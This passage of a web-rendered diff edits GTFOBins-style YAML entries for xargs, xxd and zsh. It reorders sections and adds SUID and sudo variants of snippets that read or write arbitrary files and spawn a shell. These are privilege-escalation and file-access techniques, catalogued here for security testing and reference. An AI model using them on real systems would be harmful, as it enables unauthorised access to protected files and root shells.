|
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
|
||||||
|
GNU version only.
|
||||||
code: |
|
code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
xargs -a "$LFILE" -0
|
xargs -a "$LFILE" -0
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./xargs -a /dev/null /usr/bin/id"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo xargs -a /dev/null /usr/bin/id
|
||||||
---
|
---
|
||||||
|
@ -1,19 +1,19 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo xxd "$LFILE" | xxd -r
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./xxd "$LFILE" | xxd -r
|
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
xxd "$LFILE" | xxd -r
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo data | xxd | xxd -r - "$LFILE"
|
echo data | xxd | xxd -r - "$LFILE"
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
xxd "$LFILE" | xxd -r
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./xxd "$LFILE" | xxd -r
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo xxd "$LFILE" | xxd -r
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: zsh
|
- code: zsh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./zsh"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo zsh
|
- code: sudo zsh
|
||||||
suid-enabled:
|
|
||||||
- code: ./zsh
|
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user